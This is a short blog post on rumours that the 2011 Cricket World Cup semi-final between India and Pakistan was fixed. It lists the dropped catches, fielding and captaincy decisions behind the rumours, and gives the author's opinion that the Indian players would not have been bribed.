Games that are deliberately lost are sometimes called thrown games. When a team intentionally loses a game, or does not score as high as it can, to obtain a perceived future competitive advantage (for instance, earning a high draft pick) rather than gamblers being involved, the team is often said to have tanked the game instead of having thrown it.

So, Is India vs Pakistan Semi Final World Cup 2011 Match Fixed? Was there match fixing already there between India vs Pakistan semifinal match at 2011 WC?

After India won the match, there are many rumors coming on India and Pakistan team regarding match fixing for world cup semi final match on 30th march 2011. 

Based on following point people are assuming match has been already fixed:
  • Missing 5 catches of master blaster Sachin Tendulkar.
  • Poor fielding , no good & Irresponsible shot by Pakistani player.
  • Shahid Adridi didn't take power play at his time.
  • Bad Umpiring decisions.
Is this correct? Was there really match fixing done?

As far as my opinion....
"With all those Millions paid to the super star cricketers to Indian players (and the clouds of recent spot fixing of some Pakistani players) nobody from the Indian team would give a damn to bookies even if they paid 10 times of their earnings. At least not in this world cup where the most expectations and pressure is on Indian team than any other team."

The Truth so far....

Go through This file and see the real propaganda behind the Match Fixing Issue.

U would find the detail information.

Photo Source: cricinfo.com 

Hey! My friends, If you like my post you can save it using "Save Page as PDF" button below and you can even share them to your friends with social networking buttons provided below this post.

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo